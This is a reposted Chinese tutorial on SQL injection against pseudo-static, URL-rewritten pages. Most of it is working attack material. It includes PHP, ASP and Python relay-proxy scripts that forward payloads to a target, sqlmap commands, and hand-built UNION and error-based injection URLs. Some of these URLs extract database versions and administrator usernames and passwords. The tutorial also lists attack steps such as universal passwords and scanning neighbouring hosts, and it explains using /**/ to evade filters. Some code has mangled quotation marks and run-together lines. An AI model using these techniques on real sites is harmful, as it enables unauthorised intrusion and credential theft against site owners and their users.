伪静态注入的总结

伪静态页面渗透

在日常的测试中，经常会遇到静态页面，尤其是政府类的站点（前提经过授权），此时就会非常的棘手，在下多试验后，发现以下思路或可以帮助我们跨越这个障碍。

伪静态即是网站本身是动态网页如.php、.asp、.aspx等格式动态网页有时这类动态网页还跟“?”加参数来读取数据库内不同资料。很典型的案例即是discuz论坛系统，后台就有一个设置伪静态功能，开启伪静态后，动态网页即被转换重写成静态网页类型页面，通过浏览器访问地址和真的静态页面没区别。前提服务器支持伪静态重写URL Rewrite功能

判断方法

在浏览器里控制台（console),输入代码或粘贴js代码

alert(document.lastModified); 回车执行，会弹出一个弹窗。

重新刷新网页，再用相同的方法在控制台里输入查询代码，再查看文件的最后修改时间，如果发现时间不同则可以判断它是伪静态。

如果是伪静态页面，可以尝试将其变成动态页面。伪静态的话只是由动态转成了静态，从地址上你是可以看到转递参数的，比如phpweb，它的链接是这样的：news/?123.html，这个你可以理解成news.php?id=123。所以你可以news/?123*.html这样提交。或者可以进行伪静态中转。（伪静态中转注入总结：博客园地址）

入侵的大概思维方式

对搜索框进行测试（注入测试）
对登录处进行测试（万能密码、注入）
对站点进行目录扫描（发现其他突破口）
从C段下手

一：中转注入法

1.通过http://www.xxx.com/news.php?id=1做了伪静态之后就成这样了

http://www.xxx.com/news.php/id/1.html

2.测试步骤：

中转注入的php代码:inject.php

<?php
set_time_limit(0);
$id=$_GET["id"];
$id=str_replace(” “,”%20″,$id);
$id=str_replace(“=”,”%3D”,$id);
//$url = "http://www.xxx.com/news.php/id/$id.html";
$url = "http://www.xxx.com/news.php/id/$id.html";
//echo $url;$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>

3.本地环境搭建PHP，然后访问http://127.0.0.1/inject.php?id=1

通过sqlmap或者havj可以跑注入漏洞。

附录ASP中转代码：

<strong><font style="font-size: 12pt"><code id="code1"><%
JmdcwName=request("id")
JmStr=JmdcwName
JmStr=URLEncoding(JmStr)
JMUrl="http://192.168.235.7:8808/ad/blog/"  //实际上要请求的网址
JMUrl=JMUrl & JmStr&".html"    //拼接url
response.write JMUrl&JmStr    //我这里故意输出url来看
'JmRef="http://127.0.0.1/6kbbs/bank.asp"
JmCok=""
JmCok=replace(JmCok,chr(32),"%20") 
JmStr=URLEncoding(JmStr)  response.write  PostData(JMUrl,JmStr,JmCok,JmRef) //url,查询字符串，cookie，referer字段Function PostData(PostUrl,PostStr,PostCok,PostRef)  
Dim Http
Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
With Http
.Open "GET",PostUrl,False
.Send ()
PostData = .ResponseBody
End With
Set Http = Nothing
PostData =bytes2BSTR(PostData)
End FunctionFunction bytes2BSTR(vIn)   //处理返回的信息
Dim strReturn
Dim I, ThisCharCode, NextCharCode
strReturn = ""
For I = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn, I, 1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn, I + 1, 1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
I = I + 1
End If
Next
bytes2BSTR = strReturn
End FunctionFunction URLEncoding(vstrin)    //发包前对参数的url编码一下
strReturn=""
Dim i
'vstrin=replace(vstrin,"%","%25") '增加转换搜索字符,
'vstrin=Replace(vstrin,chr(32),"%20") '转换空格,如果网站过滤了空格,尝试用/**/来代替%20
'vstrin=Replace(vstrin,chr(43),"%2B")  'JMDCW增加转换+字符
vstrin=Replace(vstrin,chr(32),"/**/")  '在此增加要过滤的代码 //这里很关键，方便啊，把空格自动换成/**/，后面会说到的
For i=1 To Len(vstrin)
ThisChr=Mid(vstrin,i,1)
if Abs(Asc(ThisChr))< &HFF Then
strReturn=strReturn & ThisChr
Else
InnerCode=Asc(ThisChr)
If InnerCode<0 Then
InnerCode=InnerCode + &H10000
End If
Hight1=(InnerCode And &HFF00) \&HFF
Low1=InnerCode And &HFF
strReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1)
End if
Next
URLEncoding=strReturn
End Function%></code></font></strong>

二、手工注入法

1.http://www.xxx.com/play/Diablo.html

http://www.xxx.com/down/html/?772.html

2.测试注入：

http://www.xxx.com/down/html/?772′.html

http://www.xxx.com /play/Diablo'.html

http://www.xxx.com/play/Diablo'//and
//1='1 /*.html

http://www.xxx.com/play/Diablo'
//and
//1='2 /*.html

http://www.xxx.com/page/html/?56′//and//1=1/*.html 正常

http://www.xxx.com/page/html/?56′//and//1=2/*.html 出错

3.看页面是否存在差异，相同则不存在，不同存在注入。

4.联合查询：

http://www.xxx.com/play/diablo’ and 1=2 union select 1,2… frominformation_schema.columns where 1='1.html

http://www.xxx.com/page/html/?56'//and//(SELECT//1//from//(select//count(),concat(floor(rand(0)2),(substring((select(version())),1,62)))a//from//information_schema.tables//group//by/**/a)b)=1/*.html

三、手工注入法（二）

http://www.xxx.net/news/html/?410.html

http://www.xxx.net/news/html/?410'union//select//1//from//(select//count(),concat(floor(rand(0)2),0x3a,(select//concat(user,0x3a,password)//from//pwn_base_admin//limit//0,1),0x3a)a//from//information_schema.tables//group//by//a)b//where'1'='1.html

注：

伪静态的注入和URL的普通GET注入不太相同
。普通url的get注入的%20,%23,+等都可以用；但是伪静态不行，会被直接传递到到url中，所以用/**/这个注释符号表示空格。

三、SQLmap方法

在sqlmap中伪静态哪儿存在注入点就加*

http://www.cunlide.com/id1/1/id2/2
python sqlmap.py -u “http://www.xxx.com/id1/1*/id2/2″

http://www.xxx.com/news/class/?103.htm

python sqlmap.py -u “http://www.xxx.com/news/class/?103*.html”

四、python脚本方法

代码一：

<code id="code3">from BaseHTTPServer import *
import urllib2
class MyHTTPHandler(BaseHTTPRequestHandler):def do_GET(self):path=self.pathpath=path[path.find('id=')+3:]proxy_support = urllib2.ProxyHandler({"http":"http://127.0.0.1:8087"})opener = urllib2.build_opener(proxy_support)urllib2.install_opener(opener)url="http://www.xxx.com/magazine/imedia/gallery/dickinsons-last-dance/"try:response=urllib2.urlopen(url+path)html=response.read()except urllib2.URLError,e:html=e.read()self.wfile.write(html)
server = HTTPServer(("", 8000), MyHTTPHandler)
server.serve_forever()</code>

转载：https://www.cnblogs.com/jsq16/p/5942003.html

https://blog.csdn.net/qq_41545233/article/details/106713530